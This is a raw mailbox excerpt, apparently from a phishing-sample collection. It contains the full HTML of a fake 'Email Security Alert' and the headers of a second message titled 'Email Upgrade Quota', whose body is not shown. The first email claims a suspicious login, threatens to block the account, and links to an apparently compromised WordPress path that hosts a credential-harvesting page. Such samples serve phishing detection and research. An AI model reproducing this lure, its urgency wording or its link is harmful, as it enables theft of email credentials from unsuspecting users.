From: "Email Security Team email " <service@efox-shop.com>
Date: Mon, 10 Apr 2017 17:27:39 -0700
Reply-To: noreply@emailsecurity.com
Status: O
X-Status: 
X-Keywords:                  
X-UID: 141

You will not see this in a MIME-aware mail reader.
--===============1607195202==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

=20
--===============1607195202==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<!doctype html>
<html>
<head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso=
-8859-1"/>
<meta charset=3D"utf-8">
<title>Email Security Alert</title>

<link rel=3D"icon" href=3D"files/favicon.ico" sizes=3D"13x13" type=3D"image=
/png">

</head>

<br>

<table width=3D"550" border=3D"0" align=3D"center">
  <tbody>
    <tr>
      <td>


                        <table align=3D"center" width=3D"570"><tr>

                <td style=3D"width:570px; height:80px; font-family:
Verdana; font-size: 18px; color:#ffffff;
                                background-color: #B40404; border: solid 1p=
x #B40404; padding: 10px;
                                -moz-border-radius: 6px; -webkit-border-rad=
ius: 6px;
-khtml-border-radius: 6px; border-radius: 6px;">

                        <table align=3D"center"><tr><td>
                        <div align=3D"center">
                        <font face=3D"Lucida Grande, Lucida Sans Unicode,
Lucida Sans, DejaVu Sans, Verdana, sans-serif"
                    size=3D"+2" color=3D"#FFFFFF">

                        Email Security Alert

                        <br>

                        <font size=3D"2">for - Account User: </font>


                        <font size=3D"+1">

                        </font>

                        </font>
                        </div>
                        </td></tr></table>

                </td></tr></table>


      </td>
    </tr>










    <tr>
      <td height=3D"20"></td>
    </tr>












     <tr>
      <td>


                        <table align=3D"center" width=3D"570"><tr>

                <td style=3D"width:470px; height:200px; font-family:
Verdana; font-size: 18px; color:#ffffff;
                                background-color: #FFFFFF; border: solid 1p=
x #B40404; padding: 10px;
                                -moz-border-radius: 6px; -webkit-border-rad=
ius: 6px;
-khtml-border-radius: 6px; border-radius: 6px;">

                        <table align=3D"center" width=3D"470">

                    <tr><td>
                        <font face=3D"Lucida Grande, Lucida Sans Unicode,
Lucida Sans, DejaVu Sans, Verdana, sans-serif"
                    size=3D"2" color=3D"#000000">
                    <div align=3D"left">

                    <p>
                    This is to notify you that someone from an
unrecognized location tried logging into your e-Mail
                    <font color=3D"#B40404"></font> few minutes ago.<br>
                    Was this done by you?
                    </p>




                    <p>
                    For your account security, we strongly recommend
that you verify your account
                    now, else you account will be blocked without further n=
otice.
                    </p>



                    <p>
                    <a
href=3D"http://www.webitude.ro/magazin/wp-content/themes/twentyfifteen/NewD=
omain/crypt/index.html?">
                    Click here to Verify your E-mail account now
                    </a>
                    </p>



                    <p>
                    After verification, extra security features will
be activated in your email settings and your
                    account will be safe for use again.

                    <br>


                    </p>


                    </div>
                        </font>
                        </td></tr>



                    </table>

                </td></tr></table>


                        <br>

                        <font face=3D"Lucida Grande, Lucida Sans Unicode, L=
ucida Sans, DejaVu
Sans, Verdana, sans-serif" size=3D"2" color=3D"#000000">
                        <div align=3D"center">
                        Source:
                        <b>Email Security Team</b>
                        </div>
                        </font>



      </td>
    </tr>





  </tbody>
</table>


<body>
</body>
</html>

--===============1607195202==--

From jose@monkey.org Wed Apr 12 10:01:13 2017 +0000
Return-Path: webmaster@emailserver.com
Delivered-To: jose@monkey.org
X-FDA: 72721595226.12.cakes25_27b56b18cb63e
X-Spam-Summary: 50,0,0,55d6ebcd7a00d994,d41d8cd98f00b204,webmaster@emailserver.com,:,RULES_HIT:41:72:379:495:800:962:967:969:973:983:988:989:1147:1189:1208:1254:1260:1263:1313:1314:1381:1431:1433:1434:1436:1437:1516:1517:1518:1542:1571:1575:1588:1589:1592:1594:1685:1711:1714:1730:1764:1777:1792:2196:2198:2199:2200:2525:2560:2563:2610:2682:2685:2693:2737:2790:2859:2890:2894:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3044:3138:3139:3140:3141:3142:3351:3865:3866:3867:3868:3871:3872:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4361:4552:5007:6261:6678:7652:8516:8518:8603:8797:9025:9121:9388:9466:10004:10215:10346:11233:11480:11657:11658:11914:12029:12043:12903:13025:13095:13139:13374:13439:13846:14093:14096:14181:14721:14828:14849:14877:21080:21433:21450:21451:21524:30001:30021:30022:30026:30054,0,RBL:error,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0,LFtime:72,LUA_SUMMARY:none
X-HE-Tag: cakes25_27b56b18cb63e
X-Filterd-Recvd-Size: 127650
Received: from server01.resulticks.biz (unknown [23.246.208.211])
	by imf02.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 12 Apr 2017 10:01:12 +0000 (UTC)
Received: from [162.213.31.251] (unknown [162.213.31.251])
	by server01.resulticks.biz (Postfix) with ESMTPA id 42D333797B6
	for <jose@monkey.org>; Wed, 12 Apr 2017 04:30:26 -0500 (CDT)
Content-Type: multipart/mixed; boundary="===============1334164947=="
MIME-Version: 1.0
Subject: Email Upgrade Quota
To: jose@monkey.org
